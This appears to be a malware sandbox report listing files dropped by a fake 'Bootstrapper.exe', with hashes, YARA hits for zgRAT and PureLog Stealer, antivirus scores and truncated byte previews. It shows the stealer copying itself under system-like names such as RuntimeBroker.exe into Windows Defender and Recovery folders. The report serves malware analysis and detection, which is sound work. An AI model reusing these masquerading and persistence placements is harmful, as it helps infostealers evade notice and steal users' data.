Preview:	6wHjRVB9QPaaxB7KkyPqBwzsjExa5WlFRlDDA2snoL8dZWvV8KUqucbJ6YANhlD3oUIL74KsGlBzxWSMTbbvC5VyJ4Gl2eGDIFyFNjYE9mjJbmVkGx3FJR1s9TCDyizle8qshN9uDXwZVMXhiffElA30NFG3hVPaw7oc5nC2yJBvfcWx5eeSDvAeE0ebHGMsIVmXh5m5dmQb9IUvsT7C07XB7KXEIlvs7TnKz9PA1jzbeje6ftsyIJ1K8kaXhhx10iepeK5tD7LRH5hYpbjY27jxbcMOi1cUw7k6FzcVx8uL8kDCDCsF8Y938rOB7rLMe0fJVlTz9Nl3NYy0ZJLgIXWX8r7XkaXGxhqHF3rcs2GuxFqj2XmyfoDHeHLon5Pi0eGprqvfctxQQlk3AXfMyjkJejm7sCyxnh4S9A1LmGVw0x03hRnQZCuQ36LIExxZ49msrR49fTkrNySq

C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1691136
Entropy (8bit):	7.437459803423374
Encrypted:	false
SSDEEP:	24576:qZ7++sZ0aUug2+rBTcPFpCoPpMZ+tkrvNrBZWLH0M7mM+YZ5kGxi0xliaQNeprdu:q8MTwI+KLNNZGt7muZ5kpIj1prd7s
MD5:	BE4E61EEC8A6CAB29C1AEDDD29D869EC
SHA1:	AB621A907B95050B681DAD9D5B9546BDC1452725
SHA-256:	2ED865A2E6310507DD10B185B5FB5C22300C99A8B33B8B8FDDAFC07CB8D86EBF
SHA-512:	58C64DB09C1C93D97CB220DD0F31B32E989272B459C833ABA47EF89F972BFACD9FC238F447F16361E5D05F8460D283D71D0CC8456E6F6C9FE12FBDCF08FE02E5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.+g................................. ........@.. .......................@............@.................................`...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H.......................4................................................0..........(.... ........8........E........)...N...M...8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ........8........0.......... ........8........E....................P...t...8....~....(J... .... .... ....s....~....(N....... ....~....{b...:....& ....8....8R... ....~....{....9z...& ....8o...~....9.... ....8[......... ........8C...r...ps....z....~....(R...~....(V...

C:\Program Files (x86)\Windows Defender\en-GB\9e8d7a4ca61bd9

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	177
Entropy (8bit):	5.703142522756202
Encrypted:	false
SSDEEP:	3:h3fI703rTn5KUCmpR99XDwUy+10CmmTMpXkcaKxbdkKNBHwo/t1lQxXC:h3A703AA9dsUyK0bQM1kc5bNBQo1XOS
MD5:	45BFEB4B4612777CAFDB1B9E0A468B6F
SHA1:	82E76D4B8B6ECA7D1AEC6E8006340B0C1FE688BA
SHA-256:	100A5333F72C28B3878166ADB66EF4A69200203A7812B2DFD32E1F08491B6A0A
SHA-512:	1D9FF59B7487B40B816D4AEABF2A58DFB0C55201484CE69C8986DE7D2E5925943538B3AF4C2DA015FD2148B9660B6FA668E17A7564F22871D66A8C6E99CE9C2C
Malicious:	false
Preview:	7gBRADg14TBkse0fwvd0SR3oeW4xVKp62lGvBd183rwOdKpib411rw1pnWxoJsguoErGXFdT4e7leoLUqWVbSxPGubIoqMzKLCkZciLWai7MzQK8Lc8wXFb0ykW67ymrpwZcDw2HL8AuzCRdQJdONCxGkuk1MPZm5PhC0s5Zk1lYErBwT

C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1691136
Entropy (8bit):	7.437459803423374
Encrypted:	false
SSDEEP:	24576:qZ7++sZ0aUug2+rBTcPFpCoPpMZ+tkrvNrBZWLH0M7mM+YZ5kGxi0xliaQNeprdu:q8MTwI+KLNNZGt7muZ5kpIj1prd7s
MD5:	BE4E61EEC8A6CAB29C1AEDDD29D869EC
SHA1:	AB621A907B95050B681DAD9D5B9546BDC1452725
SHA-256:	2ED865A2E6310507DD10B185B5FB5C22300C99A8B33B8B8FDDAFC07CB8D86EBF
SHA-512:	58C64DB09C1C93D97CB220DD0F31B32E989272B459C833ABA47EF89F972BFACD9FC238F447F16361E5D05F8460D283D71D0CC8456E6F6C9FE12FBDCF08FE02E5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.+g................................. ........@.. .......................@............@.................................`...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H.......................4................................................0..........(.... ........8........E........)...N...M...8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ........8........0.......... ........8........E....................P...t...8....~....(J... .... .... ....s....~....(N....... ....~....{b...:....& ....8....8R... ....~....{....9z...& ....8o...~....9.... ....8[......... ........8C...r...ps....z....~....(R...~....(V...

C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\7b3bf1de107bcf

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	201
Entropy (8bit):	5.762155162456871
Encrypted:	false
SSDEEP:	3:ZQWLXynJUn0h1vQsn34cO+Q+Ahp0mvHd9gGieQ1HHPLb4iR2nWcy3utWdw/U19TT:rLXKU0hT34mQ/LpvHfgUy4yn3By/6Tlt
MD5:	8BAB95EB703B87B301330F48C28FA84A
SHA1:	95548FAA59FFC0FCBDA17EA43A28567E901C8303
SHA-256:	558D81B5CBEAAFEF411494F0D3D78D3E808801770D9AE76BCB663317C3B45CA6
SHA-512:	7BC5F1ABC7DDAC5432563C6EA2FE3920B8BC0A073EBE7CD3B84C3069869B765CE277D8EF5EF86DF65A2C0C5E1A82F3E2AD3423A52916F56896B686480BAEEF56
Malicious:	false
Preview:	A55jXzjfPnhNEnWaYB3syiTjlRhv4Ch1mNj6pzr2bQDPIkRuILlR8kXclW7GRykMFql0EZujUBRheDbBAwntbQ2BzHUT1lknq0Kb8aqsaB76T07i56GfL1vyxjB6Ebstbo1n39CjG4SZT6s9JwY4fEbyFVoZZtn9TNfo8Uo54gYQjWf10BwSDyOWMCihVmKXRSGFaDAzH

C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1691136
Entropy (8bit):	7.437459803423374
Encrypted:	false
SSDEEP:	24576:qZ7++sZ0aUug2+rBTcPFpCoPpMZ+tkrvNrBZWLH0M7mM+YZ5kGxi0xliaQNeprdu:q8MTwI+KLNNZGt7muZ5kpIj1prd7s
MD5:	BE4E61EEC8A6CAB29C1AEDDD29D869EC
SHA1:	AB621A907B95050B681DAD9D5B9546BDC1452725
SHA-256:	2ED865A2E6310507DD10B185B5FB5C22300C99A8B33B8B8FDDAFC07CB8D86EBF
SHA-512:	58C64DB09C1C93D97CB220DD0F31B32E989272B459C833ABA47EF89F972BFACD9FC238F447F16361E5D05F8460D283D71D0CC8456E6F6C9FE12FBDCF08FE02E5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.+g................................. ........@.. .......................@............@.................................`...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H.......................4................................................0..........(.... ........8........E........)...N...M...8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ........8........0.......... ........8........E....................P...t...8....~....(J... .... .... ....s....~....(N....... ....~....{b...:....& ....8....8R... ....~....{....9z...& ....8o...~....9.... ....8[......... ........8C...r...ps....z....~....(R...~....(V...

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BootstrapperV1.2_b3bef142175e2c9feedfe8f06a73673fcbfff2_9c4008b6_30f6e9a1-f165-47a5-8b2f-fb19d258f39b\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2642127577736206
Encrypted:	false
SSDEEP:	192:gavOc6Owr0bU9+dQlaWxejol2/fsLzuiFAZ24lO83:nOcrPbG+dQlaml23sLzuiFAY4lO83
MD5:	FA26C4B112F56286F2BBCA3DBCF0EB11
SHA1:	33C338CEB0C93D570E953CD3D58FE79D228496FE
SHA-256:	D53A38609920C932E98F90CCD749D45425CF3E1E96BCA19DC1F8F52277F723B3
SHA-512:	BABBA5BFB3E0C349753C0CFB187D39D21F4050E8BB1B7B34D24049469695945F432306DE4CBFD460D15023B6987C294DB3299A223FB7F31A307A5ABADF62625F
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.0.2.9.9.7.0.7.7.1.9.2.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.0.2.9.9.7.1.5.2.1.9.2.5.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.0.f.6.e.9.a.1.-.f.1.6.5.-.4.7.a.5.-.8.b.2.f.-.f.b.1.9.d.2.5.8.f.3.9.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.1.e.7.a.5.1.-.d.6.f.3.-.4.8.8.3.-.b.d.3.1.-.e.4.8.1.a.a.5.b.b.8.5.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.B.o.o.t.s.t.r.a.p.p.e.r.V.1...2.3...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.o.l.a.r.a.B.o.o.t.s.t.r.a.p.p.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.5.c.-.0.0.0.1.-.0.0.1.4.-.b.9.6.3.-.7.e.a.8.4.8.3.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.f.e.1.7.3.6.3.1.c.a.d.c.4.a.7.6.9.5.d.3.9.9.5.7.a.1.2.d.e.9.c.0.0.0.0.0.0.0.0.!.0.0.0.0.3.0.2.3.1.a.4.6.7.a.4.9.c.c.3.7.7.6.8.e.e.a.0.f.5.5.f.4.b.e.a.1.c.b.f.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DFC.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Thu Nov 14 03:52:51 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	609002
Entropy (8bit):	3.287000029119935
Encrypted:	false
SSDEEP:	6144:ih0npzFc+kxFZyqX3QZkNaOXF8kPaT1tJmL2llWc:W0nv1kxryqnQZqauDPaP4L
MD5:	FF799D72896E147864C7F0048B813B21
SHA1:	5B90CEC37867762DD2156C8D8F304809BE3A4AFE
SHA-256:	129BC767287D7018C3D402D2BE5DCF4A42411BE6A2F4447F71B94DCC64CCFD17
SHA-512:	E71875C803D4037F76B6D7972ED67009BA57850D45439F2F74C3759F2F1CF7305D470EE1F7E4ECF6168AB43C163DBFD1AE1D9750DDA2186C03828747682B366A
Malicious:	false
Preview:	MDMP..a..... ........t5g............4...........<...T.......<....)...........).......S..L...........l.......8...........T...........PV..............tE..........`G..............................................................................eJ.......G......Lw......................T.......\....t5g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9010.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6808
Entropy (8bit):	3.7227540589465273
Encrypted:	false
SSDEEP:	192:R6l7wVeJpqZ/HjWYZK8rJxprY89b70kf+Jm:R6lXJ0Z/HjWYAY7Xfh
MD5:	5DBFE1EC5ED45CE2B449C6F16AF94113
SHA1:	1122B2088F1B259CD9E627EA719598B7A4FDA39C
SHA-256:	E827B17AC85DF8277B25B3CC3125AE05906C8E0CE5008066C77DC2C2EB5A6420
SHA-512:	A8E8ECF8F098E8820AF748D8D10D4BF4A84DBA50D4DE17FEB6EC5F15B9C17590A7D367E3CA3237E23E47BDB185DF756F114731CC2F045336B23137F371B892CB
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9030.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4834
Entropy (8bit):	4.469412716209175
Encrypted:	false
SSDEEP:	48:cvIwWl8zskJg771I9mRWpW8VY8Ym8M4JQKy/Fjh+/yq8vayEDx5b5Jd:uIjfiI7pA7VEJaY/W2f1Jd
MD5:	AC1445B6D17B13791D4C5B40BA9ED59E
SHA1:	E2544C62D5E3814DBC1622392F033516D71881C6
SHA-256:	C245B971805B7FA7B903248CE8E68D5E262A4CB847404157828BB1563F60D4AC
SHA-512:	CC7A397175654C03C65F3863AE86C5A96DE83BD9AB0A9F2FB46860E137A4F521DCF64B7A9158192F99452DB2A958F00591C687DFDBF495C989D604DD95D3720C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="587215" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\WindowsHolographicDevices\SpatialStore\da4ee69189e3c8

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	ASCII text, with very long lines (540), with no line terminators
Category:	dropped
Size (bytes):	540
Entropy (8bit):	5.879093811180098
Encrypted:	false
SSDEEP:	12:n78Ye2YtRot9ZPLomSo2VAPl9bzpJ/Rue8s/3bIo:nUtgt9ZzomS8Pl9b1tYtErIo
MD5:	9A2AF2F143474194382136D14093BF7D
SHA1:	D956E625E75E8E295E63D547DC52BF1DB53B9C3C
SHA-256:	78E3DC9FEA1729B2EC5BA128930518F2D746DA79D8C1412B1A90DC21465AA3A5
SHA-512:	E43453388D7491AED97F84BB5065020062612D26DE93C6A48BE1D6D35D445C0DC108A5ECB7EDAE89F74D337C3AE12A0C5587A710A70A2C4E457568161BD1668D
Malicious:	false
Preview:	TTarH3oUwPCCaOi3zGKL06FZhLTIgOT2zkXKyjydFNFYspARO0T1JlqXNBK5jfyh5KM01XEQSqFn1rq1LB4p4ctN396xZ23jYhcicJZ0vDjcfCggUSuilImda961bR1ZxgOTOHZBmD312Rr1dacHIV7Q49HdNiYeMJo9xMRM3s5hOvkJRFXAytRci8ZPA5yDpZptmsDRIPOaZZBJY7LIKYpc2MayxCM7422zF1hjBF1jf1CJ7P0Cup2QuN0ZSOeGCQfhhMEhamHEgG6BJR1hLKNO9lE1AHRwlvgPVfluLTlHiyuoQzQAX742DRi5HMgTUUdujrpopGV2iFpL1akK1QZo1oMD7qn9wSwOU9EjJmVQlCT7lXDrlVbE5z34fmq8dWFQSb01VBBO4ICyVOckm5Xb0sSfGJEh5WwO7DoKgMVkUMJwwEjQJGWh9oZkIVvL6dTiWy1SkRDakxGnigsBkxXyAOPTnEBLbJn03la8NRq2C67LhvBmmtlIGeiHiiofP29bJPu7FuySHfwDRDv2CZjrheuY

C:\ProgramData\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1691136
Entropy (8bit):	7.437459803423374
Encrypted:	false
SSDEEP:	24576:qZ7++sZ0aUug2+rBTcPFpCoPpMZ+tkrvNrBZWLH0M7mM+YZ5kGxi0xliaQNeprdu:q8MTwI+KLNNZGt7muZ5kpIj1prd7s
MD5:	BE4E61EEC8A6CAB29C1AEDDD29D869EC
SHA1:	AB621A907B95050B681DAD9D5B9546BDC1452725
SHA-256:	2ED865A2E6310507DD10B185B5FB5C22300C99A8B33B8B8FDDAFC07CB8D86EBF
SHA-512:	58C64DB09C1C93D97CB220DD0F31B32E989272B459C833ABA47EF89F972BFACD9FC238F447F16361E5D05F8460D283D71D0CC8456E6F6C9FE12FBDCF08FE02E5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.+g................................. ........@.. .......................@............@.................................`...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H.......................4................................................0..........(.... ........8........E........)...N...M...8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ........8........0.......... ........8........E....................P...t...8....~....(J... .... .... ....s....~....(N....... ....~....{b...:....& ....8....8R... ....~....{....9z...& ....8o...~....9.... ....8[......... ........8C...r...ps....z....~....(R...~....(V...

C:\Recovery\da4ee69189e3c8

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	ASCII text, with very long lines (795), with no line terminators
Category:	dropped
Size (bytes):	795
Entropy (8bit):	5.89423061583448
Encrypted:	false
SSDEEP:	24:3mp2QuybtA8eBiceabjEZSNCOK5/KZShkl6WR:Wp3uybO8eBicenV4ZShkl6WR
MD5:	C9D8C93775C088E16E0290FA277673A2
SHA1:	5622920DFF99D43F196E2B351F38BD514BA11073
SHA-256:	FCE561FD791CA1466268BB17DE231788F5CFA231510A64C6213CFE9F81DF4E59
SHA-512:	6621EAF6E529A5086469D5474FC022E3B254A115DE38960F68BBF7BEBB8BDD653416ABA621C36D91F90982A9182947D7B21CAB12F67FA8B365FAC69B423B5D86
Malicious:	false
Preview:	nYCztHyS611KILPXnuFbCDFoeZUXX9WlB5E32KwMwYR6bfkhKCwxSJujTXUTxa56fPIMHWfd83pnwIN8zwNUNiT2LejezcZWdUbLWXaxgTyYeGxKJVeAMls65QBnwBngeSKbrBmbWax4u4YEqZUe8YJ1mfQGWwAfpS4L6VdItCowxxMA276XqJhFJSzLvfFjZSPbAMIU5Mu5uXEyTPOY0nzguyCngRXO7EXfiuApzlceYmVvOA2gRqtwcsrMKfynzg8pAiPiPijOKUHIcQYfZ17QVkC0CxeUxyp2npvqvTRsGelHkjt3GSO7jsUZfZfbEPbWpPewfsuFjOJ194PdEkNejrT5VWKVyzo1DPcVE6YYiJYUicZlKCWdC6w85jbIiZQukSyuc4ZHLz6aT9X26jKwdKzGcdZffQzI2otPopIQmPRMAWp6MiM9OeQZdrR8e4m59xhpPHOQa4JN3mGGydT7D04XXTw6YKwsnVMMy9qET5iUVDg1lKJAlo2J3JS5VS2QIbkiZ3RzxOnHRkCTx5UNAvH8cDSprutBDSL4c8br2UNWBu1TG8IZ7pPWTmFVlmHCemE9YI1zdnUqiu7rM9itmTEYCzk03FGQMK2Zq258GT6UUjxjpXJlEYaKhp6jiB5XgEdX2hBTEjmSXuDcBAKf6fLyur1A5WaFXixQGarHVzhevHxxmdhh0aaB2pmLqAYsJh5z6xWkTDJH7qCn4DYby2O7HwXaxfbVbzVOL71yH6OxQTDMn8Rml63RS8rKa5xxmyqIVxb6MkU1obrysKxyOyt

C:\Recovery\wmnXYZRZEK.exe

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1691136
Entropy (8bit):	7.437459803423374
Encrypted:	false
SSDEEP:	24576:qZ7++sZ0aUug2+rBTcPFpCoPpMZ+tkrvNrBZWLH0M7mM+YZ5kGxi0xliaQNeprdu:q8MTwI+KLNNZGt7muZ5kpIj1prd7s
MD5:	BE4E61EEC8A6CAB29C1AEDDD29D869EC
SHA1:	AB621A907B95050B681DAD9D5B9546BDC1452725
SHA-256:	2ED865A2E6310507DD10B185B5FB5C22300C99A8B33B8B8FDDAFC07CB8D86EBF
SHA-512:	58C64DB09C1C93D97CB220DD0F31B32E989272B459C833ABA47EF89F972BFACD9FC238F447F16361E5D05F8460D283D71D0CC8456E6F6C9FE12FBDCF08FE02E5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.+g................................. ........@.. .......................@............@.................................`...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H.......................4................................................0..........(.... ........8........E........)...N...M...8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ........8........0.......... ........8........E....................P...t...8....~....(J... .... .... ....s....~....(N....... ....~....{b...:....& ....8....8R... ....~....{....9z...& ....8o...~....9.... ....8[......... ........8C...r...ps....z....~....(R...~....(V...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Bootstrapper.exe.log

Download File

Process:	C:\Users\user\Desktop\Bootstrapper.exe
File Type:	CSV text
Category:	modified
Size (bytes):	1933
Entropy (8bit):	5.35806364083093
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkWHKCHKlT40HKe60:iq+wmj0qCYqGSI6oPtzHeqKkWqCqZ40T
MD5:	65507CA9B9C7B21031F32006BEF087E0
SHA1:	61CAED87FF151C6B2B57BFF8DED3BBFC235B14F7
SHA-256:	EE2DE5A7A25F51339D44E5889A3B66C1D40BF5535D121B25A81BF49803DC7F00
SHA-512:	BFF8D8BF3E0AA376FE93B8566A07337AF0CD0CB4365000BFBBF57BF90076D2A224AEBE38C29E7C46E8C9C7127EF015DD28BA4525375A84F7EB567B18D299B2B6
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\componentreviewsavesSession.exe.log

Download File

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1306
Entropy (8bit):	5.353303787007226
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4T
MD5:	BD55EA7BCC4484ED7DE5C6F56A64EF15
SHA1:	76CBF3B5E5A83EC67C4381F697309877F0B20BBE
SHA-256:	81E0A3669878ED3FFF8E565607FB86C5478D7970583E7010D191A8BC4E5066B6
SHA-512:	B50A3F8F5D18D3F1C85A6A5C9A46258B1D6930B75C847F0FB6E0A7CD0627E4690125BB3171A2D6554DEBE240ADAB2FF23ABDECA9959357B48089CFBF1F0D9FD8
Malicious:	false
